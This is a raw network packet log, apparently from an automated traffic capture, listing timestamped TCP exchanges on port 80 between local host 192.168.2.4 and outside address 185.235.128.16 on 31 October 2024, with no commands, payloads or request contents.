                                                                                                                                            Oct 31, 2024 17:12:24.858721972 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.858728886 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.858751059 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.858793020 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.859164000 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.859191895 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.859216928 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.859220028 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.859236002 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.859249115 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.859261036 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.859276056 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.859286070 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.859303951 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.859319925 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.859347105 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.859349012 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.859373093 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.859396935 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.859415054 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.971481085 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.971560001 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.971561909 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.971596003 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.971605062 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.971642017 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.971648932 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.971683979 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.971694946 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.971719027 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.971724987 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.971751928 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.971767902 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.971788883 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.971805096 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.971849918 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.971899033 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.971946001 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.971962929 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.971995115 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972008944 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972029924 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972038031 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972064018 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972075939 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972110033 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972204924 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972238064 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972261906 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972270012 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972280025 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972302914 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972312927 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972343922 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972361088 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972394943 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972398043 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972462893 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972779989 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972815037 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972830057 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972847939 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972862005 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972882032 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972887993 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972915888 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972934961 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972949982 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972958088 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.972982883 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.972990036 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973017931 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973023891 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973051071 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973062038 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973086119 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973093987 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973121881 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973133087 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973161936 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973202944 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973236084 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973252058 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973278046 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973701954 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973753929 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973757982 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973798037 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973804951 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973840952 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973858118 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973875999 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973902941 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973907948 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973922014 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973942995 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973958969 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.973977089 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.973988056 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974009991 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974020958 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974047899 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974061012 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974095106 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974104881 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974123955 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974136114 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974158049 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974165916 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974193096 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974206924 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974225998 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974253893 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974261999 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974267006 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974298000 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974322081 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974343061 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974502087 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974534988 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974545956 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974569082 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974577904 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974601984 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974615097 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974653006 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974678993 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974683046 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974715948 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974749088 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974782944 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974782944 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974800110 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974818945 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974829912 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974859953 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974868059 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974899054 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974909067 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974934101 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.974942923 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.974987030 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975281000 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975310087 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975351095 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975364923 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975367069 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975399971 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975409985 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975435019 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975441933 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975469112 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975476980 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975502014 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975511074 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975536108 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975542068 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975569963 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975584030 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975604057 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975609064 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975639105 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975645065 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975680113 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975889921 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975924015 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975934029 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975958109 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975964069 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.975991011 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.975997925 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.976027012 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.976027012 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.976058960 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.976067066 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.976093054 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.976099968 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.976126909 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.976135015 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.976161003 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.976172924 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.976196051 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:24.976197958 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:24.976234913 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.088816881 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.088906050 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.088921070 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.088937998 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089009047 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089032888 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089049101 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089065075 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089080095 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089176893 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089176893 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089176893 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089262962 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089279890 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089294910 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089309931 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089312077 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089324951 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089333057 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089364052 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089566946 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089582920 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089598894 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089607000 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089616060 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089632988 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089652061 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089678049 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089864016 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089879990 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089900970 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089911938 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089915037 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089931011 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089931011 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089946032 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089950085 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089965105 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089966059 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089982033 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.089987040 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.089998007 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090008974 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090020895 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090039968 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090063095 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090392113 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090405941 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090420008 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090437889 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090441942 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090456963 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090462923 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090482950 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090502024 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090543032 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090564966 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090580940 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090585947 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090596914 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090605021 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090615034 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090624094 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090639114 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090657949 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090832949 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090874910 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090939999 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090955973 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090970993 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090984106 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.090987921 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.090998888 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091002941 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091017962 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091022015 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091036081 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091037989 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091054916 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091073036 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091412067 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091424942 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091439009 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091454029 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091461897 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091469049 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091480970 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091490984 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091504097 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091520071 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091538906 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091692924 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091716051 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091731071 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091737032 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091753006 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091757059 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091773987 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091773987 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091789961 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091795921 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091808081 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.091814995 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091834068 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.091851950 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.092180967 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.092196941 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.092211008 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.092227936 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.092233896 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.092243910 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.092252016 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.092267036 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.092272997 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.092283010 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.092293978 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.092298985 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.092314959 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.092325926 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.092345953 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:25.092554092 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:25.092570066 CET8049754185.235.128.16192.168.2.4
